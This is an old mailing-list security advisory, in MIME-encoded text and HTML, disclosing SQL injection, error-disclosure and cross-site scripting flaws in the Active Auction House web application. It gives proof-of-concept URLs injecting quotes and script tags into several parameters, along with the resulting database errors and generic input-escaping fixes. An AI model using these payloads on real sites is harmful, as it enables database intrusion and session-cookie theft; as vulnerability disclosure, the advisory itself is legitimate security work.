alert(document.cookie)&%3baccountid=3D Pops cookie Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), = mysql_real_escape_string() and other functions for input validation = before passing user input to the mysql database, or before echoing data = on the screen, would solve these problems. Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah Author:=20 These vulnerabilties have been found and released by Diabolic Crab, = Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to = contact me regarding these vulnerabilities. You can find me at, = http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for = my soon to come out book on Secure coding with php. -----BEGIN PGP SIGNATURE----- Version: PGP 8.1 - not licensed for commercial use: www.pgp.com iQA/AwUBQlLSLSZV5e8av/DUEQJy+wCfficKxFWekfTVbslFf6X2fYgkFZ0AniJA lWYvwOWmoKGHgDKanamGDcvc =3DGAwn -----END PGP SIGNATURE----- ------=_NextPart_000_0006_01C53A39.2224C870 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable

-----BEGIN PGP SIGNED = MESSAGE-----
Hash:=20 SHA1

Dcrab 's Security Advisory
[Hsc = Security Group]=20 http://www.hackerscenter.com/<= BR>[dP=20 Security] http://digitalparadox.org/=

Get Dcrab's Services to audit your Web = servers,=20 scripts, networks, etc. Learn more at http://www.digitalpara= dox.org/services.ah

Severity: High
Title: Active Auction = House has=20 multiple Sql injection, error and XSS vulnerabilities
Date:=20 06/04/2005

Vendor: Active Web Softwares
Vendor = Website: www.activewebsoftwares.com=
Summary:=20 Active auction house has multiple sql injection, error and xss=20 vulnerabilities.

Proof of Concept Exploits: =

http://localhost/activeauctionsuperstore/default.asp?catid=3D'SQL= _ERROR
SQL=20 ERROR
Microsoft OLE DB Provider for ODBC Drivers error=20 '80040e21'

ODBC driver does not support the = requested=20 properties.

/activeauctionsuperstore/displaycategories.asp,=20 line 52

http://localhost/activeauctionsuperst= ore/default.asp?Sortby=3DItemName&SortDir=3D'SQL_INJECTION
SQL= =20 INJECTION
Microsoft OLE DB Provider for ODBC Drivers error = '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in = query=20 expression 'ItemName 'SQL_INJECTION'.

/activeauctionsuperstore/includes/gentable.asp, line 39

http://localhost/activeauctionsuperstore/default.asp?Sortby=3D= 'SQL_INJECTION
SQL=20 INJECTION
Microsoft OLE DB Provider for ODBC Drivers error = '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in = query=20 expression ''SQL_INJECTION'.

/activeauctionsuperstore/includes/gentable.asp, line 39

http://localhost/activeauctionsuperstore/ItemInfo.asp?itemI= D=3D'SQL_INJECTION
SQL=20 INJECTION
Microsoft OLE DB Provider for ODBC Drivers error = '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in = query=20 expression 'ItemID=3D'SQL_INJECTION'.

/activeauctionsuperstore/ItemInfo.asp, line 18

http:/= /localhost/activeauctionsuperstore/sendpassword.asp
SQL=20 INJECTON
In the Email field enter a sql injection and done ;) For=20 example
entering 'SQL_INJECTION you get
Microsoft OLE DB Provider = for ODBC=20 Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error in=20 FROM
clause.

/activeauctionsuperstore/sendpassword.asp, line 45

http://localhost/activeauctionsuperstore/?ReturnURL=3D'%3E%3Cscript%3E= alert(document.cookie)%3C/script%3E&username=3Ddcrab&password= =3D
Pops=20 cookie

http://localhost/activeauctionsuperstore/?ReturnURL=3Dstar= t.asp&username=3Ddcrab&password=3D'%3E%3Cscript%3Ealert(document.= cookie)%3C/script%3E
Pops=20 cookie

http://localhost/activeauctionsuperstore/?ReturnURL=3Dstart.a= sp&username=3D'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&= ;&password=3D
Pops=20 cookie

http://localhost/a= ctiveauctionsuperstore/account.asp?ReturnURL=3D%22%3E%3Cscript%3Ealert(do= cument.cookie)%3C/script%3E
Pops=20 cookie

http://localhost/activeauctionsuperstore/= sendpassword.asp?Table=3DAccounts&Title=3D'php_evil_valuehttp://local= host/activeauctionsuperstore/sendpassword.asp?Table=3DAccounts&Title=3D= %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops=20 cookie

&Title=3DAccount'>http://loc= alhost/activeauctionsuperstore/sendpassword.asp?Table=3D"><script&g= t;alert(document.cookie)</script>&Title=3DAccount
Pops=20 cookie

&amp%3baccountid'>http://= localhost/activeauctionsuperstore/watchthisitem.asp?itemid=3D"><scr= ipt>alert(document.cookie)</script>&amp%3baccountid=3DPops=20 cookie

Possible Fixes: The usage of htmlspeacialchars(),=20 mysql_escape_string(), mysql_real_escape_string() and other functions = for input=20 validation before passing user input to the mysql database, or before = echoing=20 data on the screen, would solve these problems.

Keep your self updated, Rss feed at: http://digitalparadox.org/rss.a= h

Author:
These vulnerabilties have been found and released by = Diabolic=20 Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel = free to=20 contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com = or http://digitalparadox.org/. = Lookout for my=20 soon to come out book on Secure coding with php.

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed = for=20 commercial use: www.pgp.com

iQA/AwUBQlLSLSZV5e8av/DUEQJy+wCfficKxFWekfTVbslFf6X2fYgkFZ0AniJA
= lWYvwOWmoKGHgDKanamGDcvc
=3DGAwn
-----END=20 PGP SIGNATURE-----

------=_NextPart_000_0006_01C53A39.2224C870--